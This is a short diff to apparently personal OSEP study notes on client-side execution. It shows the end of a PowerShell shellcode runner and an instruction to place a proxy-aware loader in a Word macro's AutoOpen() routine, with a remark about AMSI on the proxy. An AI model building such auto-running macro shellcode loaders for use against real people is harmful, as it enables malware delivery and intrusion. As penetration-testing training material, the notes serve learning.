satanicang3l/osepnotes/docs/clientexecution/psshellcodeinword.md

 [Kernel32]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")
 ```

-Using this will detect proxy and with user agent, but might fail if the proxy server got AMSI? **(with proxy aware and user agent)**:
+Using this will detect proxy and with user agent, but might fail if the proxy server got AMSI?
+Add this to a Microsoft Word Macro `AutoOpen()` **(with proxy aware and user agent)**:

 ```vb
 Sub MyMacro()